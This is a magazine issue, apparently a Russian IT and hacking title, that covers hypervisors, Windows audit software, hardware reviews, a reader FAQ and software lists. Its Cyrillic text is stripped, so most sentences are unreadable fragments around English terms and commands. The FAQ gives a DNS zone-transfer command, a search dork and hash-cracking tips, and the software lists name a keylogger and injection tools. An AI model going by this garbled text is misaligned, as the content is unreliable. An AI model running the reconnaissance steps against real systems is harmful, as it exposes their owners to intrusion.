. PowerShell, .
VM ,
, .
,
Hyper-V Smart Paging,
.

. , 32
(NIC Teaming),
. ,
(Layer 2) Hyper-V Extensible Switch, :
VLAN (Private VLAN),
,
ACL, VLAN Trunking ( VLAN), , ARP Spoofing DHCP Snooping .
PowerShell WMI.
PowerShell :

API, .
Virtual Fibre Channel VM,
LUN MPIO (Multipath I/O).
Win2012
,
Hyper-V Resource
Metering, CPU
RAM, , /
. ,
Enable-VMResourceMetering.
,
ResourceMeteringSaveInterval.

PS> Get-Command -CommandType Cmdlet *VMNetworkAdapter*


PS> Get-Command -CommandType Cmdlet *VMSwitch*

VMWARE ESXI/VSPHERE
VMware (vmware.com)
VMware ESXi,
300 , (baremetal). ,
.
ESXi, .
VMware vSphere, , , . 5.1, .

SCVMM 2012:

Microsoft
System Center. Virtual
Machine Manager 2012
/ , -
-
.
VM, Hyper-V, VMware Citrix XenServer.
VMM2012
(Fabric), VM, .


, Distributed
Resource Scheduler VMware,

, VMM VM .
, VMM
, .
VM ,
.
VMM

Hyper-V. -

P2V- V2V-.
VMM 2012
Server Application Virtualization (Server App-V).
VMM Service Template Designer
,
. /
, ( VM). VMM
. Self-Service,
.


Citrix XenServer 6.0

XenCenter

, VMware
VMware vCloud
Suite, VMware vSphere, vSphere Storage Appliance
VMware Site Recovery Manager.
,
32
ESXi. RAM 32 , ESXi
. .
: , SOHO,
, 32 ,
. CPU. 1 . Free
(vMotion, HA,
DRS, Storage DRS, VM),
vCLI API .
. shell
su, . .
( , Win8/2012) , , 9- Version 9 virtual hardware,
AMD Piledriver Intel Ivy Bridge / Sandy Bridge,
VT-x/EPT (Extended Page Tables) AMD-V/RVI (Rapid
Virtualization Indexing) ,
CPU (RDRAND, RDFSBASE, RDGSBASE, x2APIC ). Improved CPU Virtualization VM CPU,
CPU. vCPU VM
32 64. ,
Windows XP Mode (Virtual Hardware-Assisted Virtualization).
(vGPU)
3D- ,
VMware View,
NVIDIA VGX.
, vCenter 5.1 ESXi,
3. ( Edit Settings Select
compatibility),
. : stateless caching stateful installs.
ESXi Auto
Deploy,
ESXi PXE,
.

.
SESparse VMDK (Space-Efficient Sparse)

.
4 , ,
.
FCoE (Fibre Channel over
Ethernet).
storage API VAAI
NAS . vSphere ,
VMFS, ,
32, , ,
VDI, NFS.
Hyper-V 3.0, VM
ESXi, SAN, vMotion Storage
vMotion ( VMware vSphere 5.1 vMotion Architecture,
Performance and Best Practices, goo.gl/TIF9C). vSphere
Replication Appliance VM LAN WAN

VM. MSCS (Microsoft Cluster Service)
.
SSD- SMART-.
VM vSphere Data Recovery vSphere
Data Protection (VDP),
EMC Avamar. ,
Changed Block Tracking, (variable-length)
.
vSphere Distributed Switch
(Network Health Check)


RAM
32 , ESXI
.


, HEARTBEAT
NFS
VLAN, MTU Teaming, , .
SR-IOV :
MAC- vCenter, (RSPAN ERSPAN),
NetFlow 10, SNMP v3 .
, 5.1 vSphere
Client ,
-, Flash (
Apache Flex).

CITRIX XENSERVER
XenServer (citrix.com) Xen

. : ,
(Live Motion)
, VM
(XenMotion), , High Availability, P2V- .
6.0.2,
2012 , ,
, VDI
. 1 , 16 vCPU 128
vRAM . 6.0.2

Xen 4.1 credit2,


( 255 CPU), GPT (CPU pools
partitioning). Xen 4.1 API (mem_access API), AVX
x86 CPU, PXE- , (HVM). :
dom0, ,
Win8/2012 (goo.gl/khBNu).
,
.
XenServer ISO.
VDI GPU , .
IntelliCache VDI.
Open vSwitch (openvswitch.org),
Active-Backup NIC bonding
, NetFlow, sFlow, RSPAN, ERSPAN, CLI, LACP
802.1ag.
.
Integrated Site Recovery, StorageLink
Gateway Site Recovery,
.
HBA SCSI. , Heartbeat-
NFS-.
vApp (Virtual Appliance) VM. OVF, VM- OVF- XenCenter
VM (vCPU, vRAM, ).

, , -
,
. z
WWW

RED HAT
Red Hat Enterprise Virtualization (redhat.
com/promo/rhev3), ,
Red Hat Enterprise Linux 6 KVM
(Kernel Virtual Machine) Qumranet.
GNU GPL, , oVirt.
2009 ,
2012- . : Live Migration, High availability,
, , VDI .
Red Hat Enterprise Virtualization
Manager, Java-, JBoss. :
,
RESTful API . , VM.
sVirt
SELinux. MS SQL Server PostgreSQL. 160


CPU 2 , 64 CPU
512 . (Transparent Huge
Pages): 2 4 , .

Transparent Huge Pages
TLB- (Translation
Lookaside Buffer) .
VM x2APIC ,

. , /
Async-IO. SPICE,
, WAN: ,
,
Linux-. VM
( Live Migration). vhost-net
.

SR-IOV:
http://youtu.be/
hRHsk8Nycdg;

VMware
vSphere 5.1:
goo.gl/TIF9C.

INFO

VMware tools 5.1+


SYN/ACK

(grinder@synack.ru)


WINDOWS-
, , . //
, - , .
, , , , ,
.
.

Win2k8R2,

WINDOWS SERVER 2008/2012


Win2k8 .
, 53.
, , .

, .
,
. , Active
Directory ,
:
Directory Service Access ;
Directory Service Changes ;
Directory Service Replication ;
Detailed Directory Service Replication
.

(Global Audit Policy, GAP), (SACL,
System access control list) . (Event
Viewer),
: (, , ), , ,
.
,
. Win2k8 , ,
(, ).
Win2k8R2
, e-mail
. , ,
Win2012 .
, , *-Eventlog *-WinEvent.
:
PS> Get-Help *-Eventlog

, ID 4720 (
):

Win2012

Win2012 . (Dynamic Access Control)


expression-based ,

. ,
, ,
.
(Global Object
Access Auditing).
( 4656,
4663), ,
.
, . ID: (4663) (4656).
,

Active Directory. .
/ / / :
, ,
, , ,
, . (, ).
/
/ / .
Win2012 auditpol. GAP , :

?
:
; ;
;
;
.

PS> Get-EventLog security | ?{$_.eventid -eq 4720}


> auditpol /list /subcategory:*

:
> auditpol /set /subcategory: \
/success:enable /failure:enable

Windows
, ,
, . ,
, -
. .
, ,
, (HIPAA, SOX, PCI ) ,
( ). Windows
128 ,
. , Event Viewer
.
.
( ) . ,
.
: Windows
, .
,
, ,
.

NETWRIX CHANGE REPORTER SUITE


NetWrix (netwrix.ru)
Change Reporter,
: Active Directory, GPO, ,
SQL Server, VMware, SharePoint, .
Change Reporter Suite Enterprise
Management Suite, .
Microsoft System Center Operations Manager,
, AD, GPO Exchange SCOM.
NetWrix SIEM
(Security Information and Event Management) , .
Change Reporter :
. ,
. NetWrix ,
, .

,

. , ,
Audit Configuration
Wizard. , .
,
. : , ,
.
, e-mail,
. : snapshot,
, AD .
10 ,
, .
, , Network Infrastructure Change Reporter
, SNMP,
.
.
Change Rollback Wizard
,
.
, , , , Snapshot Reporting, SCOM.
NetWrix Change Reporter , Windows XP SP3 ,
IIS ( 64- 32- VIDEO

, SQL
Microsoft

Log Parser (goo.gl/b1IlI),
.
, SQL- ,

, , .
, :


> logparser "SELECT DISTINCT EventID FROM security"


Log Parser Active Directory, IIS Exchange Server.
(W3C, CSV, XML), SQL-,
syslog, .
Log
Parser Studio (goo.gl/vqQdT).





Windows Server
2012 ,


Event
Viewer

PowerShell.


NetWrix

ADAudit Plus ,

). MS SQL Server
2005, Express Edition. NetWrix
,
.

. . ,
. ,
. . Compliance
, SOX,
HIPAA, PCI-DSS, GLBA FISMA. , (Report
Profile Based Reports) . ADAudit Plus ,
,
/.
ADAudit Plus ,
Windows, XP (32- 64- ).
MS SQL Server 2k5/2k8/2k8R2.
. : Free, Standard Professional (
).
100 .
ADAudit Plus, Zoho
EventLog Analyzer, SIM (Security Information
Management).

ADAUDIT PLUS
Zoho (manageengine.com)
, .
ADAudit Plus, AD, GPO,
, , .
, ,
,
. (
Failover Clusters) , ,
. XLS, HTML, PDF CSV.
e-mail.
,
.
, , e-mail
.
AD GPO .
, :
,
;
/ ,
;
( Exchange, TS,
, ), ,
AD;

.
- ,
. .
, : Home,
Reports, File Audit, Alerts, Configuration, Admin Support.

. Home
, , , /
.
150 ,
Reports,


QUEST CHANGEAUDITOR
Quest Software
ChangeAuditor (quest.com/changeauditor),
AD, Exchange,
SQL-, SharePoint, LDAP-,
EMC, NetApp VMware vCenter.
: ,
, ,
/ ,
, ,
. -


,
,
E-MAIL


AD,
OU GPO. , .

e-mail, WMI SNMP.
:
, ,
.
, .

, .

, . ,
.
, ChangeAuditor
.

,
SAS 70, HIPAA, GLBA, ISO 17799, FISMA.
,
, .
.
, Quest InTrust
Windows .

,
.
, ChangeAuditor Coordinator.

, ,
. MS Systems Center
Operation Manager Quest Software. , Quest InTrust SIM ,
Windows *nix,
.
,
x86/x64 Windows XP SP2, Coordinator
Windows Server 2003 SQL Server 2k5 SP2.

data)
, AD .
,
, ,
,
, -
. , ,
.

.
, ,
, (,
, , ).

.
(CSV, Excel )
. .
,
Windows.
Varonis DatAdvantage 200 500 . Varonis
DatAdvantage, Windows, AD, SharePoint,
Exchange *nix.

Windows, , ,
. ,
. z
INFO
Win2k8:



,

.

WARNING

Windows
128 ,



.
,

Event Viewer


.

.

VARONIS DATADVANTAGE FOR WINDOWS


, ,
. ,
,
, ,
. Varonis DatAdvantage
(varonis.com) . (unstructured


WWW
EventID:
kb.monitorware.com/
kbeventdb.html.

NetWrix Change Reporter



FERRUM

ASUS O!PLAY
MEDIA PRO

UPGRADE




ru.asus.com

O!Play ASUS ,
Media Pro ,
, set-top box, ,

Smart TV.
ASUS O!Play Media Pro
RTD1185DD. ,
, , ,
.
,
,
. -,
, ASUS
O!Play Media Pro Wi-Fi
802.11n, -,
DVB-T.
:
SD/MMC USB-, USB
, AV-.
HDMI
mini-HDMI,
,
.
ASUS O!Play Media Pro
,
Realtek , .
DVB-T,

,
, .
, -,

, YouTube,
Dailymotion, Picasa, Flickr, Yahoo, - -,


Muzee. - AceTrax Facebook



.
SmartTV
,
YouTube Facebook
Facebook
YouTube? ASUS O!Play
Media Pro ! ,
.
.


lossless- APE,
-
CUE.
Dolby TrueHD,
MKV.
, ISO,
,
.

RightTxT, .
Apple TV!

USB- 60 /,
HD- -

. , ASUS O!Play Media Pro


Full HD ,
50 60 . , ,
-, .
HD Wi-Fi-
,
25 /.
,
,
O!Play.

!. ,
O!Direct, ,
ASUS O!Play Media Pro ,
. , Android,
O!MediaShare, , O!Direct,
.
ASUS O!Play Media Pro
,

. z


FERRUM

OCZ VERTEX 4
25SAT3-256G


VERTEX


: Intel Core i7-3960X Extreme Edition,
3300 @ 3600
: ASUS P9X79 PRO
: Corsair CMGTX7, 1 x 4 ,
DDR3 1333
: Chaintech GE240GT-A1024N1
: CSSD-F120GB2 120
: Corsair CMPSU-1000HX, 1000
: Windows 7
, 64

-: 2,5
: SATA 3.0
: MLC, ONFi 2.2, 25
: Indilinx Everest 2
: 560 /
: 510 /
: 2
: 256

6700
.

+
-

SSD .

,
,

.
, SSD
Vertex ( ,
) .
,
OCZ Vertex
Indilinx
. OCZ Vertex 2
OCZ Vertex 3
LSI SandForce. Indilinx,
OCZ Technology
. ,
,
LSI SandForce



SSD



PCMark Vantage OCZ
VTX3-25SAT3-240G

Indilinx ,
- .
OCZ VTX4-25SAT3-256G,
, OCZ Vertex 4, Indilinx Everest 2.
(MLC) SSD 25- .
: 64, 128, 256 512 .
- LSI SandForce?
-, SSD
OCZ
Technology, .
-, Indilinx Everest 2

(, JPG, MP3 ),
SandForce SF-XXXX.
Anvil's Storage
Utilities 1.0.27.
,
OCZ VTX4-25SAT3-

IOMETER
Random read 4 : 24,2 /
Random write 4 : 80,91 /
Seq. read 128 : 360,99 /
Seq. write 128 : 411,98 /
Iometer patterns:
Database: 41,52 /
Fileserver: 52,95 /
Workstation: 36,5 /
Webserver: 74,47 /
PCMARK VANTAGE (HDD)
Test Suite: 35 923
Windows Defender: 171,91 /
Gaming: 152,72 /
Importing pictures to Windows Photo
Gallery: 150,16 /
Windows Vista startup: 218,83 /
Video editing using Windows Movie
Maker: 175,31 /
Windows Media Center: 218,5 /
Adding music to Windows Media Player:
121,07 /
Application loading: 153,8 /
ANVIL'S STORAGE UTILITIES 1.0.27
Seq. read/write (
): 487,974/412,09 /
Seq. read/write ( ):
488,08/410,26 /

256G . ,
,
.

Indilinx
LSI SandForce, OCZ Technology
4- Vertex
.
,
,
. , ,
,

Vertex. OCZ Technology
,

. , ,
, NAND OCZ VTX4-25SAT3-256G
. z


FAQ

(cherboff@gmail.com)

FAQ


FAQ@REAL.XAKEP.RU

, JTAG,

?

,

, , .


JTAG- ( ,
).
,
,
,
,
.

: TDI/TDO /
, TMS TCK
. ,
,
,

(
). ,
-,
.

, BGA- (

, ),

- .
,
JTAG-finder',


.


Arduino JTAGenum (bit.ly/jtagenum)

.


USB- Linux?


Linux

sysfs. USB
,

.
/sys/bus/usb/
devices/, ,
, .

/sys/bus/usb/devices/[id ]/[id

]/power/level.

auto.

suspend. ,
, .
:
echo suspend | sudo tee /sys/bus/usb/devices/[id ]/[id ]/power/level

, , .
- ,
auto on.

-
?



,

, , .
,
name-. ,
.

?
,
,
.

. .


!

,
.
, CTF-,
,
.
.



,
, AXFR-
:
$ dig @ns-server mysterydomain.net axfr


,
, ,
DNS-
nmap ( , ).

-:
* inurl:mysterydomain.net



,
serversniff (bit.ly/serversniff).
Q . ,
- ,
?
, -
,
,
-.
, ,


,
InsidePro (insidepro.
com/hashes.php). ,


( ):
, .
,
, , , md5(sha1(md5($pass)).sha1($pass)). ,
hash-identifier
(bit.ly/hashid),


,

JTAG.
, ,
.

embedded-
(ARM),
.

JTAG (Joint
Test Action Group).
,
,
,
,

. ,
JTAG
,
.
,
, -
,
,
,
-. GOD-mode
, , ,
,

(
).
. ,
JTAG ,


JTAG


,
JTAG- ,
.
, ,
. ,

,

.
, , , Wiggler (
, , LPT-
).

IDE (Keil, IAR),

(Open OCD).


DEFCON-:
DEFCON #7812 (defcon-russia.ru)
DefCon-UA (defcon.org.ua). -,
, ,
- , .


, Black Hat DEF CON,

.
Zeronights (zeronights.ru) Positive Hack Days
(phdays.ru),
.


, , ,

. , ,
. ,
, , .

.

Android 2.x?

, ,
.
Google Play Market,

. ,

Android 3.2,

. ,
, ,
, ,
, root-,
.
Android Debug Bridge,
, Android SDK (bit.ly/droidsdk).
USB ( ).
USB-
,

Android SDK (android-sdk\extras\google\usb_
driver\).
Dalvik Debug Monitor (\android-sdk\
tools\ddms.bat) Device
Screen Capture.
!

,
VirtualBox, ?

VirtualBox, ,
, ,
VSphere,
VMware . , VirtualBox API
.

phpVirtualBox (bit.ly/phpvb) ,
GUI- ,
,
.

- PHP
5.1.0.
AJAX ,
,
. ,

,
.

Q

Tor
?

phpVirtualBox - VirtualBox

-
Tor, ,
,
,

.

,
VPN.
Tor'
: !
! ;).
, , .
, Skype
.

SkypeMorph (bit.ly/
skypemorph).
Skype
ID (5 ) SkypeKit ,
Skype.

( ) .

,
.

torrc
.
, . ,

,

:).

bash'

. ,
Python,

. ,
- ?


Python sh (amoffat.github.com/sh/index.html).

:
,
.
,
:
from sh import ifconfig
print(ifconfig("wlan0"))

:
from sh import ls
print(ls("-l"))


. , :
from sh import adduser
adduser("amoffat", "--system",
        "--shell", "/bin/bash",
        "--no-create-home")


cron Windows?
,
A ,


, nnCron (nncron.ru). :

;

;
,
,
, ;
////
/
,
;
-
, ;
;

;

. z


>Multimedia
Actual Multiple Monitors 4.2
Daum PotPlayer 1.5
Flutter 0.1.185
iSpy 4.5.4
MartView 2.5.2
MP3Gain 1.2.5
PhotoPad Image Editor
QMP3Gain 0.9.0
Shark007 3.8.0
Splash Lite 1.8.0
TVersity 2.3
VideoMach 5.9.7
VLC 2.0.3
Volume2 1.1.3

>Misc
AltMove 2.1.7
Compare Advance 1.4.0
Explzh 7.06
FileOptimizer 2.10
FlashTray Pro 4.0
Handy File Tool 2.00
HaoZip 3.0
Lanchbar 4.0
Limagito FileMover Lite
9.109.19.1
Lost Photos 1.0
NoteTab Light
PasteAsFile 2.1.4.0
Phrozen Safe USB 1.0
Split Byte
StartMenu 8
USB Fix It

>Development
Checkheaders 1.0.1
CommitMonitor 1.8.3
CrashRpt 1.3.1
CruiseControl 2.8.4
glog 0.3.2
Google Test 1.6.0
MetalScroll 1.0.11
QDevelop 0.28
Rapidjson 0.1
RockScroll 1.0
SQL Watch 4.0
Sublime Text 2.0.1
Symfony 2.0
TortoiseGit 1.7.13
TortoiseHg 2.5.1
Twitlib 2.0

>>WINDOWS
>DailySoft
foobar2000 1.1.15
Google Chrome 22
0
Miranda IM 0.10.4
Notepad++ 6.1.8
Opera 12.02
PuTTY 0.62
Skype 5.8
Sysinternals Suite
Total Commander 8.01
Unlocker 1.9.1
uTorrent 3.2
XnView 1.99.1

>>UNIX
>Desktop
Ardour 2.8.14
Artofillusion 2.9.1
Audacious 3.3.2
Avidemux 2.6.0
Ballroomdj 1.3
Cinnamon 1.6

>System
AbpMon 9.0
EaseUS CleanGenius 3.0.5
Fresh Diagnose 8.66
GreenCloud Printer 7.5.3
GridMove 1.19.60
Moborobo 2.0.6
ProcessAlive 0.5
Puran Utilities 1.0
PZen Dump 1.0
SharpKeys 2.1.1
Siren 3.01
SmartCopyTool
USB Disks Access Manager 1.0
WinOwnership 1.1
Wise Program Uninstaller 1.03
Beta
YAPM 2.4.1

>Security
Adobe SWF Investigator 0.6.3
EncryptOnClick 1.4.1.2
Fireshark 2.0.1
Heaper
IronWASP 0.9.1.5
jsql-injection 0.1
MemGator 2.1.2
NEWT 2.5
Peach 2.3.8
PrivaZer 1.2.24
Process Hacker 2.28
R-Crypto 1.5
Rohos Logon Key 2.9
rp++
Spyrix Free Keylogger 2.0
Termineter 0.1.0
Web shell detector 1.64
WebCruiser 2.6.1

>Net
ADSL Speed Test
Blinq 1.13
CarotDAV 1.9.7
DNSBench
Feedreader 3.14
Important Mail Alert
Mikogo 4.6
MKTwitter
Morphine
Network Sorcerer 1.3
ProxySwap
RSS Bandit 1.9.0
ShareMouse 1.0.91
UltraVNC 1.0.9.6.2
Voxeet
WifiInfoView 1.05

VSDC Free Video 2.4.2.260


Yankee Clipper 1.0.4.3

>Security
Android Security Evaluation
Framework
Clamav 0.97.6
Dnscrypt 1.1.0
EAPeak 0.1.5
Entropybroker 1.2
Faar 0.3.0
Fireshark 2.0.1
GDBFromVim
Gnutls 3.1.2
jsql-injection 0.1

>Net
4kdownload 2.4
Centerim 5.0.0b1
Choqok 1.3
Chrome 22.0.1229.79
Ekiga 3.2.7
Ktorrent 4.3.0
Lanmsngr 1.2.35
Licq 1.6.1
Mailnotify 5.4
Opera 12.02
Ostinato 0.5.1
Privoxy 3.0.19
Quassel 0.8.0
Rssowl 2.1.4
Thunderbird 15.0.1
Tvbrowser 3.2
Vuurmuur 0.8b4
Vuze 4.7.20

>Games
Megaglest 3.6.0.3

>Devel
Aptana 3.2.2
Bluefish 2.2.3
Buildbot 0.8.7
Codelite 4.1.5770
Dojo 1.8.0
Efl 1.7
Erlang r15b02
Hybridcache 0.8.5
Jsoup 1.7.1
Juce 2.0
Numpy 1.6.2
Paranoid 0.36
Percona-toolkit 2.1.3
Poco 1.4.4
Rhino 1.7r4
Sesame 2.6.9
Staff 2.0.0a1
Wxhexeditor 0.20

Conky_box
Dia 0.97.2
Digikam 2.9.0
Din 4.1
Exaile 3.3.0
Freefilesync 5.7
Gstreamer 1.0
Handbrake 0.9.8
Luminancehdr 2.3.0
Luxrender 1.0
Mupdf 1.1
Opengostfont 0.3

>>MAC
Anxiety 1.0
Bark 1.1
DiskWave 0.4.0
Eve 1.2.0
Fink 0.9.0
GrandPerspective 1.5.1
iChm 1.4.2
keychaindump
Kigo Video Converter 1.1.0
MacDjView 0.1.2
Mountain Tweaks 1.0.3
NeoOffice 3.2.1
Remote Desktop Connection
Client 2.1
RetinaCapture
Seashore 0.5.1
Sticky Notifications 1.0.4

>X-distr
CentOS 6.3

>System
Dsscheduler 0.5
Grep 2.14
Linux 3.5.4
Mksh r40f
Mosshe 12.8.20
Patch 2.7
Pydsh 0.7
Raider 0.13.2
Reiser4 3.5
Systemd 190
Virtualbox 4.2.0
Xen 4.2.0
Xorg 1.13.0
Xplorer 0.10.0

>Server
Apache 2.4.3
Asterisk 10.8.0
Cassandra 1.1.5
CouchDB 1.2
CUPS 1.6.1
HAproxy 1.4.22
Lighttpd 1.4.31
Lucene 3.6.1
Memcached 1.4.15
MongoDB 2.2
nginx 1.2.4
OpenSSH 6.1
OpenVPN 2.2.2
Redis 2.4.17
Samba 3.6.8
Sphinx 2.0.5
Squid 3.2.1

keyring-dump
Lpvs 0.1
Peach 2.3.8
Radamsa 0.3
Rkhunter 1.4.0
rp++
Skipfish 2.09b
Termineter 0.1.0
Tor-browser 2.2.39-1
Unhide
Web shell detector 1.64


UNITS / WWW2

WWW2
JETSTRAP
jetstrap.com

, Bootstrap

Bootstrap -.
: Twitter ,
Bootstrap, .
- .
, Jetstrap
, Bootstrap .
, , ; ,
.

ASCII.IO
ascii.io

YouTube ,

ASCII.IO UNIX-,
. Python,
.
. : , ,
ASCII-. , .
(, ),
.

JUMPSHARE
jumpshare.com

,
150

Jumpshare . -,
? , Jumpshare 150 ( )
, , .
2 , . ,
,
.
, , .

SHORTCUTFOO
https://www.shortcutfoo.com


shortcutFoo ( Vim Emacs), IDE (Eclipse, Visual Studio, XCode) .


.
, .

. ,
.
, .
